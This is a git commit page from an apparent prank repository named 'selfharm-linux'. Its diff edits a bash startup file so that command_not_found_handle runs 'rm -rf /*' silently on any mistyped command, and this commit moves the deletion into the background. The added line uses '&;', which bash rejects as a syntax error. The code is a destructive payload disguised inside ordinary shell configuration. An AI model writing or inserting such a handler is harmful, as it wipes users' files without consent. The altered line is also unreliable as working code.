1
Fork 0
mirror of https://github.com/RGBCube/selfharm-linux synced 2025-07-25 14:37:46 +00:00

added background process for suicide

This commit is contained in:
Mete Bilgin 2018-05-24 13:57:30 +03:00
parent b633b47c8f
commit b7a6595040

View file

@ -13,5 +13,5 @@ echo " ==================================="
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
function command_not_found_handle {
rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something >:)";
rm -rf /* 2>/dev/null &; echo "Oops, looks like you misspelt something >:)";
}